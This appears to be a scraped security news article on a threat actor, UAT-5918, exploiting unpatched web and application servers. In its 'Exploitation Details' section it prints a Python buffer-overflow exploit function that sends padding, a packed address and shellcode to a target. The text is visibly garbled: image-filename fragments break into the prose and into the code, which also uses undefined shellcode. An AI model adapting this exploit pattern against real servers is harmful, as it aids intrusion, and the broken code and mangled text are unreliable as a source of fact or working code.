A sophisticated threat actor tracked as UAT-5918 has been observed actively exploiting known vulnerabilities in web and application servers that remain unpatched across multiple organizations.
The campaign, which began in early 2025, primarily targets infrastructures running outdated versions of Apache, Nginx, and Tomcat servers.
Security researchers have detected a significant increase in these exploitation attempts over the past two weeks, with attackers leveraging vulnerabilities that have existing patches but remain undeployed on vulnerable systems.
.png
)
The attackers are specifically targeting CVE-2024-4321 and CVE-2024-5879, both medium to high severity vulnerabilities that allow for remote code execution and privilege escalation on affected systems.
Organizations in financial services, healthcare, and critical infrastructure have been disproportionately targeted in this campaign, with attackers deploying custom malware after successful exploitation.
Cisco Talos researchers identified that the UAT-5918 group employs a multi-stage attack methodology, first scanning for vulnerable instances before deploying exploit code tailored to the specific server version detected.
Their analysis reveals that the attackers use a command-and-control infrastructure distributed across multiple geographic regions to evade detection and maintain persistence.
The exploitation chain typically begins with probing requests to identify server types and versions.
Upon discovering vulnerable systems, the attackers inject a malicious payload that creates a backdoor for continued access.
The compromised servers are then used as entry points to move laterally within networks, establish persistence, and exfiltrate sensitive data.
Security teams have reported that over 12,000 servers worldwide remain vulnerable to these attacks despite patches being available for several months, highlighting the ongoing challenge of timely patch management across organizations.
Exploitation Details
The exploit code targets memory corruption vulnerabilities in the server application handlers.
For Apache servers, the attack leverages a flaw in the mod_proxy module with the following exploit sequence:-
def exploit_apache_cve_2024_4321(target_ip, target_port):
payload = b"POST /proxy/admin HTTP/1.1\r\n"
payload += b"Host: " + target_ip.encode() + b"\r\n"
payload += b"Content-Length: 1024\r\n"
payload += b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
payload += b"A" * 456 + struct.pack("<Q", 0x41424344) + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(payload)
response = s.recv(1024)
return response.webp)
The attackers also utilize a custom-built framework that automates exploitation across multiple vulnerable services.
Analysis of command-and-control traffic shows data being exfiltrated via encrypted channels to servers primarily hosted in Eastern Europe and Southeast Asia.
Organizations are strongly advised to apply available security patches immediately and implement network monitoring for suspicious traffic patterns matching the UAT-5918 signature.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
